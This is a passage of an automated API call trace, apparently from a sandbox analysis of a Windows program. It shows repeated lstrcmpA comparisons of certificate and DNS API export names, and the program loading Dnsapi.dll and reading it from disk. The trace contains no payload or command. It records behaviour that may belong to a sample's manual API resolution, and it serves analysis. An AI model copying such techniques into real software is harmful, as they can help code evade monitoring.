lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.933] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.934] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0111.935] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0111.946] GetProcessHeap () returned 0x4f0000 [0111.946] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40ba040 | out: hHeap=0x4f0000) returned 1 [0112.188] GetProcessHeap () returned 0x4f0000 [0112.188] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509190 [0112.189] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0112.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0112.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0112.207] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0112.207] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0112.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0112.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0112.208] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0112.208] GetProcessHeap () returned 0x4f0000 [0112.208] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa7b88) returned 0x3a2d010 [0112.210] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0112.210] ReadFile (in: hFile=0x17c, lpBuffer=0x3a2d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a2d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0112.457] CloseHandle (hObject=0x17c) returned 1 [0112.457] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0112.457] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.457] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0112.457] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.457] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.457] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0112.458] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.458] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.458] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0112.458] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0112.458] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.458] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.458] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0112.458] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0112.459] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.459] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0112.459] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.459] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.459] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0112.459] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0112.460] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.460] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0112.460] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0112.460] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0112.460] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.461] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.461] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.461] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0112.462] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0112.462] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0112.463] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.463] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0112.464] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0112.464] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.464] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.464] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0112.464] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0112.464] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0112.465] 